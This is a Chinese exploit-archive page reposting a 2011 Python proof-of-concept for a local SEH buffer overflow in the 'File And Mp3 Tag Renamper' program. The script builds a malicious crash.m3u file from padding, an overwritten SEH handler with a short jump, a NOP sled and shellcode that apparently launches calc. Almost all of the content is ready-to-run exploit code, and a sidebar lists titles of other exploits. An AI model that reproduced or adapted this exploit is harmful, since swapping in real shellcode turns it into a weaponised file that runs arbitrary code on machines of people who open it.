File And Mp3 Tag Renamper Local Bufer Overflow(SEH)

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

File And Mp3 Tag Renamper Local Bufer Overflow(SEH)

来源：Angel-Injection@hotmail.com 作者：Angel Injection 发布时间：2011-09-14

#!/usr/bin/python
#Exploit Title: File And Mp3 Tag Renamper Local Bufer Overflow(SEH)
#Author: Angel Injection
#Thanks: r0073r // Sid3^effects // r4dc0re // CrosS || Inj3ct0r Team || "SeeMe" // XroGuE // gunslinger_ // indoushka // KnocKout // ZoRLu // anT!-Tr0J4n // eXeSoul // KedAns-Dz // ^Xecuti0n3r // Kalashinkov3
#Home:http://1337day.com
#http://www.facebook.com/Angel.Injection
 
exploit   = "crash.m3u"
 
 
vuln    = "\x23\x0D\x0A\x23\x0D\x0A"
 
 
junk        =   "\x41" * 1200
ret      =   "\x25\x25\x34\x7D"
morejunk    =   "\x42" * 7500
NextSEH        =   "\xEB\x04\x90\x90"
SEH         =   "\x4F\x48\xD3\x75"
nops        =   "\x90" * 10
shellcode   =   "\x8b\xec\x55\x8b\xec\x68\x20\x20\x20\x2f\x68\x63\x61\x6c\x63\x8d\x45\xf8\x50\xb8\xc7\x93\xc2\x77\xff\xd0"
payload =   vuln+junk+ret+morejunk+NextSEH+SEH+nops+shellcode
 
file = open(exploit , 'w')
file.write(payload)
file.close()

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告